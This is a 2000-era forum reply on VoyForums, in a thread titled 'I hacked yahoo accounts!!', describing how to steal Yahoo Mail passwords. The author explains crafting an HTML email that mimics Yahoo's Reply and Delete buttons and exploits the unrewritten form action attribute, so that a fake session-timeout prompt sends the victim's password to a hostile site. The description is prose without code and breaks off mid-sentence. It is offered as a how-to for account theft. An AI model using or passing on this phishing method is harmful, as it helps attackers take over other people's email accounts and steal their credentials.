VoyForums
[ Show ]
Support VoyForums
[ Shrink ]
VoyForums Announcement: Programming and providing support for this service has been a labor of love since 1997. We are one of the few services online who values our users' privacy, and have never sold your information. We have even fought hard to defend your privacy in legal cases; however, we've done it with almost no financial support -- paying out of pocket to continue providing the service. Due to the issues imposed on us by advertisers, we also stopped hosting most ads on the forums many years ago. We hope you appreciate our efforts.

Show your support by donating any amount. (Note: We are still technically a for-profit company, so your contribution is not tax-deductible.) PayPal Acct: Feedback:

Donate to VoyForums (PayPal):

Login ] [ Contact Forum Admin ] [ Main index ] [ Post a new message ] [ Search | Check update time ]

[ Next Thread | Previous Thread | Next Message | Previous Message ]

Date Posted: 13:03:16 09/12/00 Tue
Author: CZ
Subject: Re: I hacked yahoo accounts!!
In reply to: CyberStalker 's message, "I hacked yahoo accounts!!" on 12:38:04 09/12/00 Tue

Another way but a little tricky.

Requirements:
You have to send an email message to the user's account at, for example, Yahoo.com. When they log in to read their mail and click the "Reply" or "Delete" button at the bottom of the message, Yahoo Mail appears to prompt them within the same window, "Session timeout: Please re-enter your password". When the password is re-entered, it is sent to a hostile site and the user continues reading their mail without noticing anything unusual.

How it works
Yahoo! Mail does not re-write the "action" attribute of a
tag contained in an email message when that message is displayed to the user. Yahoo Mail is smart enough to insert a "target" attribute into a link, for example, so that when you click on a link that someone sends you, it opens in a separate browser window. (This way, you can't fool the user into thinking that they're still inside Yahoo Mail and give them a message like "please re-enter your password".) However, their mail parser does not re-write the "action" attribute. (HotMail, on the other hand, does re-write the "action" attribute so this trick won't work.) That means when you click to submit a form inside an HTML email message, the result will be displayed in the same frame.

In order to get the user to submit a form within the Yahoo Mail message, make them think they're clicking on the "Reply" or "Delete" button provided by the Yahoo Mail interface. It's easy to figure out how the Yahoo Mail HTML interface is formatted, so in your HTML message, you just insert your own buttons, tables, etc. to look exactly like the bottom half of the real Yahoo message-reading interface. Follow this with an HTML opening comment "

[ Next Thread | Previous Thread | Next Message | Previous Message ]
Post a message:
This forum requires an account to post.
[ Create Account ]
[ Login ]
[ Contact Forum Admin ]

Forum timezone: GMT-8
VF Version: 3.00b, ConfDB:
Before posting please read our privacy policy.
VoyForums(tm) is a Free Service from Voyager Info-Systems.
Copyright © 1998-2019 Voyager Info-Systems. All Rights Reserved.